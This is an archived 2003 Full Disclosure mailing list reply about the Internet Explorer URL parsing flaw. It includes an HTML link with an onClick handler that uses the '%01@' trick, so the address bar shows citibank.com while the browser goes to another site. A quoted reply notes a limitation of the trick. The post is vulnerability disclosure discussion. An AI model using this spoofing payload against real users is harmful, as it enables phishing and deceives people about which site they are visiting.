Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

RE: RE: FWD: Internet Explorer URL parsing vulnerability

From: "Chris S" <muti () afterglo ws>
Date: Tue, 9 Dec 2003 15:17:12 -0700
<a href="http://www.citibank.com";
onClick="location.href=unescape('http://www.citibank.com%01@www.wellsfargo.c
om'); return false;">Citibank</a> will show http://www.citibank.com in the
status and location bar but direct them to wells fargo.

-----Original Message-----
From: full-disclosure-admin () lists netsys com
[mailto:full-disclosure-admin () lists netsys com] On Behalf Of Clint Bodungen
Sent: Tuesday, December 09, 2003 2:30 PM
To: full-disclosure () lists netsys com
Subject: Re: [Full-disclosure] RE: FWD: Internet Explorer URL parsing
vulnerability

However, using this approach still allows the user to see the absolute URL
path in the task bar (with the %01 ommitted).

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Previous By Date Next
Previous By Thread Next

Current thread: